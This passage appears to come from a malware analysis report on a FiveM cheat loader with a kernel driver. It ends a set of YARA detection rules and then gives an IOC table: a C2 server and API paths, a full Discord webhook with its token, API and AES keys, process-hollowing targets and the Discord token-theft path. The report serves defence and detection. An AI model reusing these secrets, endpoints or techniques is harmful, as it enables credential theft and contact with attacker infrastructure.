        $pt = "Arquivo criptografado com sucesso" ascii wide
        $pt2 = "descriptografado" ascii wide
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

rule dmcauth_encrypted_payload {
    strings:
        $magic = { 44 6D 63 45 }
    condition:
        $magic at 0 and filesize > 1MB and math.entropy(0, filesize) > 7.8
}

IOC Master Table

C2 API Serverhttp://93.127.141.9:5000
File Serverhttp://93.127.141.9:8080/ (open, no auth)
HWID Endpoint/api/ep/hwid-whitelist-check?listType=
Init Endpoint/api/ep/init → returns sessionid, expiry, webhookUrl
Blacklist Check/api/blacklist/check
Register/api/ep/register
Keys/api/keys/use
TZX Domainsapi.tzproject.com / tzproject.com
Discord Webhookdiscord.com/api/webhooks/1472751394154086491/H0o1y5y0LvXLDlrni0TyGTAgTd48th0KISqy6WlUVp8Bv5BxKWXSfcQhreoPdq6nKwUF
External IP Checkapi.ipify.org/?format=json
API KeyFTaC7sHRNwKbrMYR
API Salt470752974bfe5c36
MB Private StringSpotlessPriv2026
C2 Identifier0026d7bf
AES KeyghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS (32 bytes, .rdata @ 0x140008718)
KDF SaltDmcAuth-salt (SHA-256 → AES-CBC)
User-Agent (API)Loader-Protected/1.0
User-Agent (swift)swft/1.0
Kernel Device\Device\VolCache → \DosDevices\VolCache
IOCTL Code0x222004 (manual DLL map)
Injected DLLnetcom.dll (manual-mapped by neguin.sys)
Pool Tags0x6754794d (MyTg) · 0x7854794d (MyTx)
Developer (Gun)C:\Users\Gun\Desktop\KCustom\Kernel-UI-Protected
Developer (Gun alt)C:\Users\Gun\Desktop\aaaa\KCustom\Kernel-UI-Protected
Developer (swift)C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb
Hollowing TargetC:\Windows\System32\dllhost.exe
Hollowing Fallbackchrome.exe / RuntimeBroker.exe / msedgewebview2.exe
Token Theft Paths%APPDATA%\discord\Local Storage\leveldb\*.ldb (all 3 variants)
HWID GUID{557CF406-1A04-11D3-9A73-0000F81EF32E}
BSOD Error Code0xc0000420 (STATUS_ASSERTION_FAILURE) via NtRaiseHardError
UI FrameworkDear ImGui 1.92.3 WIP (launcher), 1.91.9 WIP (CTM), 1.91.3 WIP (v3)
Build DateMay 29 2026 16:29:35 (v3.dll PE timestamp)
Release Date20.02.2026 (MB.dll data section)
FiveM BuildsLauncher: 1604-3570 + generic; fulano.dll: 2802-3751 + generic (GameProcess + GTAProcess)